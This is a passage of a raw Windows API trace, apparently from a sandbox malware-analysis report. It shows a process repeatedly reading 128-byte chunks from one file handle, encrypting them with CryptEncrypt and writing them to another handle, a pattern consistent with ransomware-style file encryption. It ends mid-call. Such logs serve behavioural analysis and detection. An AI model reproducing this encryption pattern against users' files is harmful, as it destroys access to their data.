ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.432] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.432] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.432] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.432] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.433] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.433] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.433] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.433] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.433] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.433] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.433] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.433] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.433] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.433] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.433] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.433] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.433] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.433] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.434] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.434] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.434] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.434] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.434] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.434] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.434] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.434] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.434] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.434] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.434] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.434] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.434] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.434] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.435] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.435] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.435] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.435] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.435] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.435] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.435] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.435] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.435] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.435] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.435] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.435] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.435] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.435] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.436] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.436] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.436] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.436] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.436] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.436] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.436] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.485] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.485] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.485] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.485] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.485] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.485] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.485] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.485] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.485] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.485] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.485] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.485] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.485] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.486] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.486] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.486] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.486] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.486] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.486] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.486] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.486] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.486] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.486] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.486] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.486] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.486] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.486] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.487] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.487] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.487] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.487] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.487] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.487] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.487] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.487] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.487] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.487] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.487] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.487] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.487] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.487] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.487] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.488] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.488] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.488] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.488] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.488] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.488] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.488] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.488] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.488] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.488] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.488] CryptEncrypt (in: 